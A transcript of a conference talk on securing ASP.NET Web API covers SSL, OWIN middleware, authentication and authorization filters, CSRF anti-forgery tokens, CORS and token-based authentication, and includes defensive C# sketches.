doi | transcript | abstract
---|---|---
10.5446/51411 (DOI)
|
Hi, welcome. Wow, that's the Scandinavian excitement. Okay, anyhow. I'm happy to be back here doing this talk and for those who were here last year, I did a talk, I think with the same title, like 12 months ago, and I like to think of this as a continuously deployed talk because I'm constantly changing it, adding stuff to it, removing stuff, because we are learning, right? It's still, in the .NET space at least, kind of a new technology. So 12 months ago, this wasn't even released. It was like three months before Microsoft released the API. So now today, we are three months before version two of the API. And the idea of this talk is basically to do a mixture of what do we have today and what will we get in three months. Okay, so I have a list of features that I want to show you so that you know what's coming up, and actually I want to skip some of the basics because, you know, 60 minutes is not so much time. But if you go to Vimeo, there's the video from last year where, you know, I basically talk about these things from the point of view of 12 months ago. Okay. Also very important, I think, is when you talk about web API security today, there is this thing called OAuth, yeah, this is a protocol that is quite controversial right now. Since it's kind of hard to fit all the framework stuff and the protocol into a single talk, I'm doing a separate OAuth talk later today at three o'clock in this room. So if you care about the gory details of this protocol and if you should use it or not, then come here at three o'clock. Cool. So my name is Dominick. I guess the most important part here is my email address. If you have questions, you can write me an email or tweet me or whatever you want. So what are we going to do? We have a quick look at the HTTP security model and how we can implement that in web API. Then there's a new thing coming up in Microsoft's web stack called OWIN, which is a hosting infrastructure that will be released in, you know, or is partially released already, but the full story will be done in three months' time, which influences how you would do security in the future. We talk about the new web API pipeline, which gives you more options for how to do security, and then we talk about application scenarios. And basically, I want to take you on a journey from very simple applications that use web APIs to, you know, the way we build more complex systems and what are the challenges in between, how can web API help, and in the end, I'll show you something that can help. Good. So the big picture is we are talking HTTP. Actually, we are talking HTTPS. So whenever we're doing security with web API, we have to use SSL. SSL is not optional. It's mandatory. Okay. That's because most security mechanisms we have today on HTTP rely on the transport protection. If you don't have transport protection, well, you shouldn't bother with all the login stuff. Yeah, right? You don't need it. Everybody can read it off your wire. The next thing which is kind of important is that Microsoft has split these: even if it's called ASP.NET Web API, it actually has nothing to do with ASP.NET. There is no common base class between the two frameworks. Yeah. So ASP.NET Web API is hosting independent. You can take this thing and host it in an arbitrary process. Okay. And the host today is typically IIS. Or there's a self-host that ships with .NET or with MVC4. In MVC5, we will have a new host that has a number of interesting features.
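As an aside on that hosting independence — here's a minimal sketch (not from the talk) of what self-hosting Web API in your own process can look like, assuming the self-host package (System.Web.Http.SelfHost); the URL, route and port are placeholders, and HTTPS additionally needs a certificate bound to that port:

```csharp
// Minimal self-host sketch (assumption: the Web API self-host NuGet package is referenced).
using System;
using System.Web.Http;
using System.Web.Http.SelfHost;

class Program
{
    static void Main()
    {
        // HTTPS here assumes a certificate has been bound to port 8443 on this machine.
        var config = new HttpSelfHostConfiguration("https://localhost:8443");

        // Conventional default route; existing ApiControllers are picked up automatically.
        config.Routes.MapHttpRoute(
            name: "DefaultApi",
            routeTemplate: "api/{controller}/{id}",
            defaults: new { id = RouteParameter.Optional });

        using (var server = new HttpSelfHostServer(config))
        {
            server.OpenAsync().Wait();
            Console.WriteLine("Web API self-host running - press Enter to stop.");
            Console.ReadLine();
        }
    }
}
```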
For example, it's not bound anymore to running on .NET. You can run it on Mono, at least using the infrastructure that they provide. So that's kind of an important split. Yeah, because web API is just a bunch of classes which make up a framework and they can be hosted, which is different to ASP.NET, which was always kind of tightly bound to IIS. So let's start with this. I said it is very, very important that you always, always, always use SSL, right? And developers and SSL, they sometimes have this love-hate relationship, yeah? These pesky exceptions popping up, can't establish a secure SSL/TLS channel, things like that. So I thought, let's ask Google, yeah, to help me: how to handle SSL validation errors? And that's what I got back. Yeah, so you get plenty of guidance on how to ignore SSL validation, but not so much guidance on how to do it correctly, okay? And especially with the new application architectures we are moving to, yeah? Web APIs are perfect backends for mobile applications, right? So you are using them outside of the secure, you know, boundaries of your intranet where an admin actually controls all that stuff. So you're sitting, you know, at the airport and, you know, accessing company resources, yeah? The guy at the next table might be doing a man-in-the-middle attack against you, giving you a fake certificate, and your app might never even notice. Why? Well, because you ignored SSL certificate validation because, you know, that seems to be the popular thing, okay? So don't do that, okay? That's the thing I want to get out of the way here. For all the .NET developers out there, it's a class called ServicePointManager. If you find that in your code, like with full text search, there's something wrong. So the security model is really, really simple in HTTP, right? So we are sending everything in clear text over the wire. SSL protects, you know, from eavesdropping, replay attacks, gives us server authentication, integrity and that stuff. And whenever a server says, hey, you are not authorized to do that, you have to authenticate, it sends us back a 401, typically with a WWW-Authenticate header which tells us how we can authenticate, yeah? For example, Basic, yeah? When you get back a scheme of Basic here, the browser knows how to pop up a dialog box and you can, you know, type in your credentials, yeah? When you have typed in the credentials, the browser, if we use that as a client, will resend the request, yeah? And this time, put the credentials on the Authorization header and use the same scheme that came back earlier from the server. So it says, okay, I'm now using the Basic scheme, here are the credentials, now, you know, I retransmit the data. And how that is done, well, as I said, typically it's the Authorization header, but there are other means like query strings — you know, don't use query strings, by the way — cookies are another typical way to transmit credentials. Now, how can we implement authentication in web API, and authorization as well? And if you look at the documentation today, you will see this picture and that's the link where you can find that. So Microsoft has basically divided their pipeline into two parts: authentication, which happens first, early, and authorization, and afterwards the actual business logic which is in the controller. Now, when you want to do authentication today in web API, you have two choices and none of them are perfect, yeah? So one is you are writing an HTTP module, okay?
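Just to illustrate that challenge/response dance from the client side, a small sketch (not from the talk): the first request comes back as a 401 with a WWW-Authenticate header, and the retry carries Basic credentials on the Authorization header. URL and credentials are placeholders.

```csharp
using System;
using System.Net;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Text;

class BasicAuthSketch
{
    static void Main()
    {
        var client = new HttpClient();
        var response = client.GetAsync("https://example.com/api/values").Result;

        if (response.StatusCode == HttpStatusCode.Unauthorized)
        {
            // The server advertises the scheme(s) it accepts, e.g. "Basic".
            Console.WriteLine(response.Headers.WwwAuthenticate);

            // Resend the request, this time with credentials on the Authorization header.
            var credentials = Convert.ToBase64String(Encoding.UTF8.GetBytes("alice:password"));
            client.DefaultRequestHeaders.Authorization =
                new AuthenticationHeaderValue("Basic", credentials);

            response = client.GetAsync("https://example.com/api/values").Result;
        }

        Console.WriteLine(response.StatusCode);
    }
}
```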
That is an IIS extensibility point. I guess the advantage of that is it's a kind of simple-to-use programming model. The disadvantage is you are bound to IIS. I said web API is hosting independent. So what about now I want to take my web API and want to host it in a Windows service? Yeah, you are bound to IIS because you have host-specific investments, yeah? So the answer was, okay, if you want to do that, write a so-called HTTP message handler. And that is kind of a low-level interface in web API that gets to see all requests or responses, allows you to validate credentials, send back these status codes and headers and all these things. But then you have something which is web API-specific, okay? And then there was the authorization filter. Basically, after authentication has happened, they call the authorization filter and that makes sure that the user has certain, you know, properties, claims that allow him to actually access the business logic. And again, the model wasn't perfect because you started implementing authentication as message handlers. There was a bit of an ordering issue. It wasn't really clear, when you add multiple handlers to a web API, in which order they run, or at least if multiple people add to that pipeline, for example. So it would have been nice if there were a separate stage between message handlers and authorization filters that is specific for authentication. And Microsoft took that feedback and actually changed that. So first of all, the whole hosting thing has changed. As I said, the new hosting infrastructure that will be used by default with web API version two, but is already used today by SignalR, is called OWIN. It's the Open Web Interface for .NET — open is the key. And the interesting thing is now that Microsoft — this OWIN thing is basically a specification for how to tie together frameworks and hosts, okay? So that they can happily live together in the same process. And a number of open source frameworks are also using OWIN right now already or will use it in the future, like Nancy, Fubu, ServiceStack and so on, which means that in the future you will be able to run all these things in a single process, kind of keying off the same routing table almost. Yeah, you can say slash api goes to web API, slash this goes to NancyFX, slash something will be your SignalR hub to do the full duplex communication and so on. And for security, what that means is if you want to write authentication logic that needs to run across all these frameworks, you have to use the OWIN-specific extensibility points, okay? And Microsoft will ship a bunch of them in the next version: for JSON web tokens, which I guess is the most important one, forms authentication, Twitter, LiveID, Google, Facebook. So they are at feature parity with what they have in MVC4 right now with the DotNetOpenAuth social logins. So they will reimplement all these things, without DotNetOpenAuth, from scratch as OWIN middleware, basically meaning Microsoft donates kind of all that code so all the frameworks you are seeing on that page can use it, and your framework as well — if you are in the framework business and you set up your stuff on OWIN, you will get all this for free, okay?
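A rough sketch of what that host-independent wiring can look like in an OWIN startup class — the middleware class name is hypothetical (a sketch of it follows further down), and the Web API adapter is assumed to come from the OWIN host package for Web API:

```csharp
using Owin;
using System.Web.Http;

public class Startup
{
    public void Configuration(IAppBuilder app)
    {
        // Framework-independent, cross-cutting concerns (e.g. authentication) run first.
        // SimpleAuthMiddleware is a hypothetical middleware class, sketched below.
        app.Use(typeof(SimpleAuthMiddleware));

        var config = new HttpConfiguration();
        config.MapHttpAttributeRoutes();

        // Web API joins the same OWIN pipeline, regardless of the actual host process.
        app.UseWebApi(config);
    }
}
```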
So just to give you an idea what that new pipeline looks like: you see we have the host, which is now OWIN — doesn't matter if it's IIS or something else, they use the same OWIN pipeline regardless of the host in the future — and here you would implement hosting- and framework-independent cross-cutting concerns like authentication, okay? Then when we transition into web API we have message handlers, which are still there, which you still can use — if you have existing code for message handlers, just reuse it, it will work, okay? The other new thing they added is, before they actually run the authorization filters, there is now an authentication filter. So the idea is now that in the future you will use message handlers for cross-cutting concerns which are not necessarily security related, yeah? Like you want to inspect messages, maybe transformation — media type formatting runs in this early stage, for example, yeah? If you want to do web API-specific authentication, write an authentication filter; if you want to do web API-independent authentication, write an OWIN middleware, okay? It's about choices, I guess. Oh, and just to make it clear, as you can imagine, the more you are on that side of the world, the more generic your code will look, obviously, because you need to write code that works with arbitrary frameworks. The more you move to that side of the world, the closer you are to your business logic and the more you can, you know, write very specific code, yeah? So it depends really what you want, yeah? Just to give you an idea, that's what middleware looks like in OWIN. As I said, it's kind of an abstraction, okay? Has anyone done Node.js in the room? So there's this concept of middleware, it's a pipeline. Basically you chain together functions, okay? And you call one function, it does its work and then it calls the next function, yeah? It's like the ASP.NET pipeline, just a little bit more down to earth. And just to give you an idea, basically that's how they abstract away HTTP. It's a dictionary of string to object, okay? In there you have things like verbs and URLs and headers and all that stuff, yeah? And then you work on that level, and for example if you would authenticate someone, you would look for the Authorization header, you would pull out the credential, you would run your credential-specific logic and if you are happy you would set the principal on another key in that environment dictionary, and at some point there's other middleware that will take that, pick it up and move it to web API, okay? So just to give you an idea how low level that is, but if you are in that business that you have to support multiple frameworks, then you can work on that level. The traditional one was the message handler level. Again equally low level, but you already have, you know, .NET objects here, HttpRequestMessage and HttpResponseMessage. So you're working at a slightly higher level here. And the idea was you get the request, you do whatever you want like authentication, you generate the response and you return it, okay? And I have a pretty popular framework out there called Thinktecture IdentityModel which does exactly that. It has a thing called the authentication handler which derives from DelegatingHandler and it knows how to parse headers and query strings and cookies and client certificates and all that stuff and maps it to validation logic, and then it does the authentication for you, the claims transformation, the session handling and setting the principal.
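As a hedged illustration of that environment-dictionary level, here's what a raw OWIN authentication middleware could look like: it reads the Authorization header out of the environment, runs some placeholder validation, and sets a principal under a key that later middleware can pick up. The key names follow the OWIN spec and common Katana usage; TryValidateCredential is purely hypothetical.

```csharp
using System;
using System.Collections.Generic;
using System.Security.Claims;
using System.Threading.Tasks;

using AppFunc = System.Func<System.Collections.Generic.IDictionary<string, object>, System.Threading.Tasks.Task>;

public class SimpleAuthMiddleware
{
    private readonly AppFunc _next;

    public SimpleAuthMiddleware(AppFunc next)
    {
        _next = next;
    }

    public async Task Invoke(IDictionary<string, object> env)
    {
        // The OWIN environment abstracts HTTP as a dictionary of string to object.
        var headers = (IDictionary<string, string[]>)env["owin.RequestHeaders"];

        string[] authorization;
        if (headers.TryGetValue("Authorization", out authorization))
        {
            ClaimsPrincipal principal;
            if (TryValidateCredential(authorization[0], out principal))
            {
                // Later middleware (or the Web API adapter) picks the principal up from here.
                env["server.User"] = principal;
            }
        }

        // Hand over to the next middleware in the pipeline.
        await _next(env);
    }

    private static bool TryValidateCredential(string header, out ClaimsPrincipal principal)
    {
        // Placeholder: real logic would parse the scheme and verify the credential.
        principal = null;
        return false;
    }
}
```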
So if that's all you need, that'll work today, that'll work tomorrow — OWIN is the vNext thing, okay? So the other new thing that we'll have in web API is the authentication filter, and you see now that we are so late in the pipeline that we can have these semantics here: I can decorate controllers and action methods with attributes saying this controller needs this authentication method, that controller needs that authentication method. You can even go as granular as saying this action method needs that authentication — say the delete method needs a client certificate, for example, yeah? So depending on your needs, you can go from very generic to very granular in the future, or today as well, but this stuff is new stuff, okay? So now that's authentication, yeah? The next thing that happens afterwards, after the user is authenticated, we have authorization, and nothing has changed here really. We have the Authorize attribute — just putting it on something means the user has to be authenticated somehow, okay? We don't care too much how. You have the AllowAnonymous attribute where you can override this, saying like, okay, the whole controller needs authentication but this method here allows anonymous access, for example. And you can further specify it, like saying this action here requires that the user is in a role called foo, yeah? And for everyone who knows me, I would say never ever do that, okay? Because what you're doing here is you're tightly coupling your business logic with security logic, yeah? And whenever the requirements change — who can call the delete method here — you will have to change your code, have to retest it, redeploy, you know, all that stuff. What you should do is rather abstract away the security logic, move it out of the actual business code, and that's what you do basically by deriving from the Authorize attribute and implementing the IsAuthorized method, and implementing your custom security logic inside of there so you have it out of your business logic. And typically you would do that in a separate assembly, meaning when the security logic changes, you can just update your logic in the attribute and redeploy that assembly but not the rest of the application, okay? And that's basically how I implement what I call claims-based authorization. That's another thing from Thinktecture IdentityModel, and what this basically does is it gets rid of all of the security information in the business logic itself. It just says, hey, you know what? This method here, a PUT which returns a customer — this updates customers, okay? And whenever someone calls that operation, I will call a separate authorization logic which says, hey, here's this guy with these claims, he's trying to update a customer. Is he allowed to do that? Yes or no? Okay? So what you do is you actually describe what the method is doing and not who is allowed to call it, right? These are two separate concerns and I think you should model your APIs like that as well, okay? Questions so far? That's the pipeline, okay? Authentication on the host, authentication in web API, authorization, business logic. And now we can build stuff on top of that. So we divide applications today, I guess roughly, into two big, you know, buckets, yeah? Same domain and cross domain. Same domain means that the caller of the web API lives in the same domain as the web API itself.
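To make the "move the rules out of the business code" idea concrete, here's a hedged sketch of a custom authorization attribute (assuming Web API 2); CheckAccess is a hypothetical stand-in for whatever externalized rules engine you keep in a separate assembly:

```csharp
using System.Security.Claims;
using System.Web.Http;
using System.Web.Http.Controllers;

public class CustomerAuthorizeAttribute : AuthorizeAttribute
{
    protected override bool IsAuthorized(HttpActionContext actionContext)
    {
        var principal = actionContext.RequestContext.Principal as ClaimsPrincipal;
        if (principal == null || !principal.Identity.IsAuthenticated)
        {
            return false;
        }

        // Describe what the action does ("update" a "customer") instead of
        // hard-coding who may call it; the actual rules live elsewhere.
        return CheckAccess(principal, action: "update", resource: "customer");
    }

    private static bool CheckAccess(ClaimsPrincipal user, string action, string resource)
    {
        // Hypothetical stand-in for the externalized authorization logic.
        return user.HasClaim("permission", action + ":" + resource);
    }
}
```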
And that is very typically like, you know, an application, you render a page, this page does an AJAX-style callback back to its own application, with some web API maybe doing some validation, maybe fetching data — you know, the cool kids call that SPA today, single page application, even if you might have more than one page. There's one issue which we have to think about when doing AJAX-style or same-domain applications, called CSRF attacks, okay? So the idea is this: you are going to an application, you log in, like forms authentication, for example, yeah? You go to a page, the page does a callback to a web API in the same application and the cookie that was set by forms authentication just flows back and forth now, meaning you are implicitly authenticated in the web API as well, okay? Let me quickly show you that. Here's a page which I have implemented — wow, the projector has a problem. So while I'm talking, that side is better. So you see, basically what this page is doing is it iterates over the identity, over the claims of the user, and spits them out to the client browser. And the way I do that on that page is classic MVC style: I pass in the claims as a model into the view and I'm just rendering out the model here on the server, okay? The same thing, the same page here, just doing the client-side approach, would be this: there's no model here, yeah? And I'm actually, from my page, calling a web API here that returns the identity of the user, okay? Same idea, one is server rendered, the other one is using JavaScript to get the data while the page is being rendered, on the client side. And the point being here is both pages should return the same results, because it shouldn't make a difference from your application point of view if you're doing it server side or client side, as long as you stay in the same domain, okay? Oops. Let's run it. So I guess I have to move that also to the other side. Okay, can we see that? Yeah. Okay, so when I say identity server, this is using the server rendering version, yeah? So I have to log in. And here we are, we have two claims, my name and something I added locally. So when I go now to the client here, what you should see is the same thing, it's just a little bit different: first the page renders and then the data will come, because I'm doing the AJAX callback, okay? So in other words, this is like the it-just-works scenario, okay? But there is one issue here and that's called cross-site request forgery. When the application sends down that forms authentication cookie, yeah, it will happily send it back every time I'm doing a request to that same domain. That's how cookies work, yeah? But it also means, yeah, if I'm surfing to a different site, yeah, or in a different process, yeah, and this website makes a request to my application that I've been authenticated with already, the browser will send that cookie along as well. Okay, so let's do this. On this other tab, yeah, I haven't authenticated, yeah? I'm accessing the web API directly. You see that? I'm authenticated. Okay? So in other words, you don't want that, okay? You don't want that some application from ChinaHackshack.com, yeah, renders some script in your browser which accesses another site where you are potentially authenticated and can impersonate you, okay? So you have to protect against that. And that is CSRF. Yeah? That's the problem. We go to the app, we authenticate, we get a cookie.
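For reference, the "echo my identity" endpoint used in the demo boils down to something like this hedged sketch — a controller that just projects the caller's claims back to the client (names and route are illustrative):

```csharp
using System.Collections.Generic;
using System.Linq;
using System.Security.Claims;
using System.Web.Http;

[Authorize]
public class IdentityController : ApiController
{
    // GET /api/identity - returns the authenticated user's claims.
    public IEnumerable<object> Get()
    {
        var principal = User as ClaimsPrincipal;
        return principal.Claims.Select(c => new { c.Type, c.Value });
    }
}
```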
Now we're going to an evil app that makes requests to the same application, and we send the authentication cookie along, okay? Now Microsoft has something built in. It's not part of the framework, but it's part of the SPA template in MVC4 and it's called the ValidateHttpAntiForgeryToken attribute, yeah? And what this thing is doing is basically this, yeah? So when you go to the application and it renders down the form which has all the JavaScript on it and so on, what they do is they render two additional things. One is a cookie which has a random — or not a random number, but something that is cryptographically derived from something on the server, okay? So there is a so-called anti-forgery cookie that is rendered down, and the form has an anti-forgery token as a hidden field, okay? And now, whenever you are doing a post back to that page, you are basically posting back the cookie as well as the hidden field. And on the server, what this attribute is doing is it takes the cookie value, it takes the hidden field value, does some math on that and makes sure that they actually came from the server. And if that's not the case, it will reject the request, okay? And for web API requests, what you would send is, you would send the cookie as well and you would put the value of that hidden field as an HTTP header on your AJAX call. And again, when we come back to the application, what this attribute is doing is it looks at the cookie, it looks at the header on your AJAX call, runs some math on that, and if they don't match, rejects the request, okay? So in other words, the second tab might send the cookie, but it doesn't know the hidden field on that form. So it can't send both, okay? And if you want to see that in action, just go to Visual Studio and create a new SPA application and you will see that on the API controllers you will have that attribute, and the source code is part of the template so you can have a look at how it works and so on. But my point being here is, if you're building that type of application, CSRF is definitely a concern, okay? So protect yourself against that. Good. Questions on that? Okay. Now, I guess the much, much more interesting and more common applications you will build are so-called cross-domain applications, yeah? So even if maybe your SPA application is same domain today, maybe at some point, because of the load on it, you want to separate the front end and the back end onto different servers and then suddenly you're doing cross-domain calls, okay? And the whole cookie thing won't work anyway, so prepare for that. But the whole idea is cross-domain applications live in separate domains. One domain is here, one domain is there, and that might be, you know, a browser, that might be a native application, that might be something, and you have a different server where the web APIs live, okay? And suddenly you are in a whole new world of security scenarios. So you have to think about authentication, because cookies don't cut it anymore, yeah? You have something called CORS, which I will show you, and what you ultimately want to do is something called token-based authentication, and the next version of web API makes that much, much easier. Okay. So we have to authenticate our user somehow, right?
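As a hedged sketch of what such an anti-forgery filter for Web API calls roughly does — pull the anti-forgery cookie and the custom request header out of the message and let the ASP.NET anti-forgery helper check that they belong together. The header name and error handling here are assumptions; the SPA template's actual code differs in detail.

```csharp
using System.Linq;
using System.Net;
using System.Net.Http;
using System.Web.Helpers;
using System.Web.Http.Controllers;
using System.Web.Http.Filters;

public class ValidateAjaxAntiForgeryTokenAttribute : AuthorizationFilterAttribute
{
    public override void OnAuthorization(HttpActionContext actionContext)
    {
        var request = actionContext.Request;

        // The anti-forgery cookie rendered down with the page.
        var cookieToken = request.Headers.GetCookies()
            .SelectMany(c => c.Cookies)
            .Where(c => c.Name == AntiForgeryConfig.CookieName)
            .Select(c => c.Value)
            .FirstOrDefault();

        // The hidden-field value, sent back as a custom header on the AJAX call.
        var headerToken = request.Headers.Contains("X-XSRF-Token")
            ? request.Headers.GetValues("X-XSRF-Token").FirstOrDefault()
            : null;

        try
        {
            // AntiForgery.Validate throws if the pair was not issued together by this application.
            AntiForgery.Validate(cookieToken, headerToken);
        }
        catch
        {
            actionContext.Response = request.CreateErrorResponse(
                HttpStatusCode.Forbidden, "Anti-forgery token validation failed");
        }
    }
}
```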
And I guess the thing that, you know, has been there forever and works, kind of, is called shared secret authentication. In other words, the client and the server share a secret and the client sends the secret to the server, and if that secret matches with the database, he proves that he knows that secret. They're also called passwords, okay? That, I guess, you know, works. But there are some issues with that, yeah? For example, you always have to send that credential on the wire. Obviously, it's protected by SSL and so on, but the much bigger problem is that the password needs to be in the memory of the client for the whole session, okay? So you basically need to open that application, you type in your password and the client needs to hold on to the password as long as you're talking to the server, okay? And I mean, thinking of mobile applications, how much do users like to type in their 12 character password every time they start the application? So what do you do then? Store it on the client device in clear text? Because, you know, mobile devices don't have that much crypto. So yeah, you can do it, but it's not very, you know — it's kind of old school, yeah? Slightly better from a security point of view are so-called shared signatures, where you have a shared key and the client signs the HTTP request, sends the request, and the server signs it as well and makes sure that the signatures match, okay? And if you are able to sign the request with that secret, you have proved you know the secret, yeah? And one popular open source library for doing that is called Hawk. Hawk is from the guy that originally created OAuth 2. He left the whole committee, and I will talk about that in detail later on, but one thing he did afterwards is he created this shared signature authentication mechanism called Hawk, yeah? I mean, you have the same problems. You have to store that secret on the client, yeah? That might be okay for maybe company machines. That might be not so okay for tablets or for mobile devices, or whenever you generally have limited trust in the security of the device the client is running on. Yeah. What you really want to do, obviously because you are here in my talk, is token-based authentication, yeah? And the idea is so much better, yeah? The client has a password, for example, or some sort of secret. He goes to a token service, gives it the secret, and gets back a token in exchange. The client can forget that secret from that point on, yeah? Erase memory. It's never been seen here, okay? And from that point on, we use the token to authenticate with the web API, okay? And the way this works on HTTP is basically you put that token on the Authorization header, and a very common scheme is just saying Bearer — and again, what Bearer exactly means, come to my talk at three o'clock. Now this might be a steep curve for some people because you basically need a separate token service infrastructure. This thing must be highly available, obviously, because if this thing goes down, all web APIs that sit behind it and rely on the token issuing mechanism go down as well. So what I have had since, I think, last year already, and what web API will have in the next version, is a built-in token endpoint. Basically, we're taking this token service and moving it into the web API itself. So when you want to get started with token-based authentication, you don't need that infrastructure to start with, but you have the same semantics.
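Client-side, the token-based pattern just described boils down to something like this sketch: trade the password for an access token once at the token endpoint, then forget the password and send the token as a Bearer header. The endpoint shape (form-encoded in, JSON with an access_token field out) follows the demo; URLs, field names and the JSON library choice are assumptions.

```csharp
using System;
using System.Collections.Generic;
using System.Net.Http;
using System.Net.Http.Headers;
using Newtonsoft.Json.Linq;

class TokenClientSketch
{
    static void Main()
    {
        var client = new HttpClient { BaseAddress = new Uri("https://api.example.com/") };

        // 1. Authenticate once against the token endpoint.
        var form = new FormUrlEncodedContent(new Dictionary<string, string>
        {
            { "grant_type", "password" },
            { "username", "alice" },
            { "password", "secret" }
        });

        var tokenResponse = client.PostAsync("token", form).Result;
        var payload = JObject.Parse(tokenResponse.Content.ReadAsStringAsync().Result);
        var accessToken = (string)payload["access_token"];

        // 2. The password can be forgotten now; the token authenticates all further calls.
        client.DefaultRequestHeaders.Authorization =
            new AuthenticationHeaderValue("Bearer", accessToken);

        var identity = client.GetAsync("api/identity").Result;
        Console.WriteLine(identity.Content.ReadAsStringAsync().Result);
    }
}
```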
You're calling first the token service that's built into the API, get a token, forget about the secret and use the token from that point on. And that token could be a long-lived token, for example, saying it's valid for one week. So users only have to type in their password once a week. Google does it every two weeks, for example. So the idea is this: you are going to a special endpoint here, slash token typically, you authenticate, you get back a token and now you use the token to authenticate. I'll show you my implementation; as I said, in the next version of web API it's built in. So let's run Fiddler and let's open this. And I guess again I have to move it here. So what you're seeing here is first I'm making a round trip to the service, authenticate and get back this long string. That's the session token. Okay. And from that point on I'm using the session token to call the service, and again what the service is doing is it's just echoing back my identity information. Okay. So let's press F12 here. So you see the first request — how do I do that? Like this. You see the first request goes to the token endpoint. I'm authenticating here and, hold on. Yeah. And here we get back this access token. It's basically a JSON data structure which has two values, access_token and expires. And from that point on we just use the access token. So from here on I'm making the real calls to the business logic and you can see that we're using the session — or the access — token. From that point on my client doesn't need to know the password anymore. And I don't need to store it anymore on the client device, which is, I guess, an important message here. Okay. Make sense? Good. I probably don't have the time, but just recently I saw a presentation on this at the beach. So, make sense? Okay. Okay. Now that was a C# client. Okay. Now let's do exactly the same thing in JavaScript to show you another interesting problem. So let's actually do this, open the network thing here. So this is basically the moral equivalent of the C# client I just wrote. Okay. It's basically something that sends a credential to the server, gets back a session token and tries to use the session token afterwards. Yeah. So let's run that. Bang. It fails. Yeah. And what it does is it sends this OPTIONS request here, and this is basically a thing called CORS, cross-origin resource sharing. So this website tries to call a web API living in a different domain and browsers don't allow that. Okay. Otherwise you could do dangerous stuff. But given that this is kind of a popular scenario, that you actually want to do that, yeah, there's a specification for that called CORS which controls how you can do these cross-origin calls in the browser context. Okay. And when we look here at the console, what it actually says is localhost is not allowed by access control. Okay. That means something has prevented the cross-origin call. Yeah. And the way this works is this. Basically the JavaScript living in one domain tries to call the service in another domain. What the browser is doing under the covers is first sending an OPTIONS request saying, hey, I have code here that tries to access you and it's coming from that origin and it tries to do a POST. Are you cool with that? Yeah. And now the web API needs logic saying, do I allow requests from that domain? Yeah. And if it is cool with that, yeah, it says, okay, I allow that domain, I allow that method, I allow these headers — and it's very granular what you can do here.
And then afterwards the browser will do the actual request. If this here doesn't succeed, the browser will just stop here. That's the error you've just seen. Okay. Now web API version one doesn't include an implementation for CORS. That's again something we have implemented and there's a message handler, the CORS message handler. And obviously this is the demo mode configuration here. Yeah. But what you can specify here are things like: I allow requests from server one, two and three, I allow POST and PUT, and I allow the Accept content header, but not the, I don't know, whatever header. Yeah. So you can go very granular here, and you know, just by enabling that, I can rerun the request. And now it actually worked. Okay. Because now there's a piece of code running in that API that understands the OPTIONS request, can evaluate it against the rules engine, so to speak, and then send back the right response to that and allow that client access. So the good news here is that Microsoft liked our implementation so much that we are now moving into System.Web with that. So basically they took our code. Yeah, thank you. Took our code and it's now System.Web.Cors, and actually all the credits go to Brock Allen, a good friend of mine who did the actual implementation. Okay. And the way this works in the next version is that you have a new attribute called EnableCors. You put it on the controller, say I allow these origins, these headers and these verbs. And there can also be stars in there if that's too granular for you. Yeah. But that's how it will work in the next version of the API. Okay. Move on. The next scenario that I'm seeing more and more and more in the last 12 months going to our clients is, obviously, you have architectures where you model things as a web API and you have many clients. Yeah. For example, server-rendered .NET clients, HTML5 JavaScript type of clients and obviously all these native clients running on different operating systems like desktop, mobile and so on. And obviously if your application gets that complex, then maybe the built-in token endpoint doesn't cut it anymore, right? You need more control. You want to say, like, well, this client gets access to these resources, that client gets access to different resources. Maybe this client needs to authenticate using a web browser. That client needs to authenticate using some different mechanism. So baking all that into your actual web API becomes a little bit of a maintenance problem. And so we factor out — as always, we put a layer of abstraction in between — and that's called the authorization server, and that's actually a term from OAuth 2. And the idea is that you basically take all that logic — who is allowed to access what with which authentication method and blah, blah, blah — and move that to a separate server, and that takes care of it. Okay? And then basically the client goes first to the authorization server, requests the token, gets the token, accesses the web API. And that is actually covered by the OAuth 2 specification, which I will talk about in detail later on, yeah? But the whole idea is that you can come to an application architecture where you take a bunch of endpoints, a bunch of web APIs, and group them together into something called an application. Okay? That is a logical grouping of endpoints and you define what type of resources are inside of that application. Yeah?
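For reference, here's a hedged sketch of how that looks with the Web API 2 CORS support (the package that grew out of this implementation): enable CORS once on the configuration, then lock down origins, headers and verbs per controller or per action. The origin and header values are placeholders.

```csharp
using System.Web.Http;
using System.Web.Http.Cors;

public static class WebApiConfig
{
    public static void Register(HttpConfiguration config)
    {
        // Turns on evaluation of [EnableCors] attributes, including preflight OPTIONS handling.
        config.EnableCors();

        config.MapHttpAttributeRoutes();
    }
}

// Granular policy: only these origins, headers and verbs are allowed cross-origin.
[EnableCors(origins: "https://server1.example.com,https://server2.example.com",
            headers: "accept,content-type,authorization",
            methods: "GET,POST,PUT")]
public class CustomersController : ApiController
{
    public IHttpActionResult Get()
    {
        return Ok(new[] { "customer1", "customer2" });
    }
}
```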
Maybe your application is a user management application and you say, I can delete users, I can add users, I can, you know, add them to roles, I can search for them, blah, blah, blah. Yeah? So basically you come up with your own domain-specific things of what you can do in that application. Yeah? And now the OAuth protocol defines basically how a client can go to the authorization server and ask for permissions. Yeah? I want to be able to search and read in that application. And now you can hang off rules, and what you get back is an access token. And what the access token contains is basically who is the issuer, which application is this token for, how long does it live, who is the user, who is the client and what are they, in combination, allowed to do in the application. Okay? That's your coarse-grained authorization, and then inside your code you're doing your fine-grained authorization going from there. Okay? Now the issue was that there is nothing built in or pre-built into .NET, and, you know, even products are not that common for that. So what I've been doing the last four weeks, I've been heads down basically implementing that stuff here. And what I want to do is I want to show it to you for the first time in public. Yeah? So bear with me. It might break. Yeah? But the whole idea is, let's do this, go here. You have this thing called Thinktecture Authorization Server. And that goes hand in hand with, you know, Identity Server. So we only do authorization here. We don't do authentication. Yeah? And basically what you can do is you can configure that. That means I have to authenticate with some identity provider. That could be anything. Yeah? That could be, you know, forms login, Google, Facebook, ADFS, Access Control Service, Windows Azure AD, whatever you want to connect to it. And then you have now this notion of an application. Okay? So we can create an application, give it a name, NDC demo, give it some entry point in the URL namespace, NDC. That's the audience claim that will go in the token. So the recipient knows whom this token is for. Yeah? We can give it some description. Can have a logo. Yeah? I can set a signing key. Do I want to do symmetric signatures, asymmetric signatures? I can specify other stuff like, do I want to require the user to give consent when the application asks for permission, stuff like that? And then I can save it. Okay? And now I can define scopes. So we have scopes here, like your read scope. Yeah? And what? Scopes. Read. Oh, it's required. And the delete scope, for example, yeah? Delete. If something is really important for you, you can emphasize it. So when the user clicks the I-allow-that, he sees that emphasized on the screen, yeah? Saying, hey, that's something, you know, you should pay attention to. And then you can, per scope, decide which of your clients will be allowed to request permission for that scope. Yeah? So maybe your corporate intranet application can request delete permissions, but your iOS app can't, for example. Okay? So basically you can hang off permissions from there. And you can also define clients. 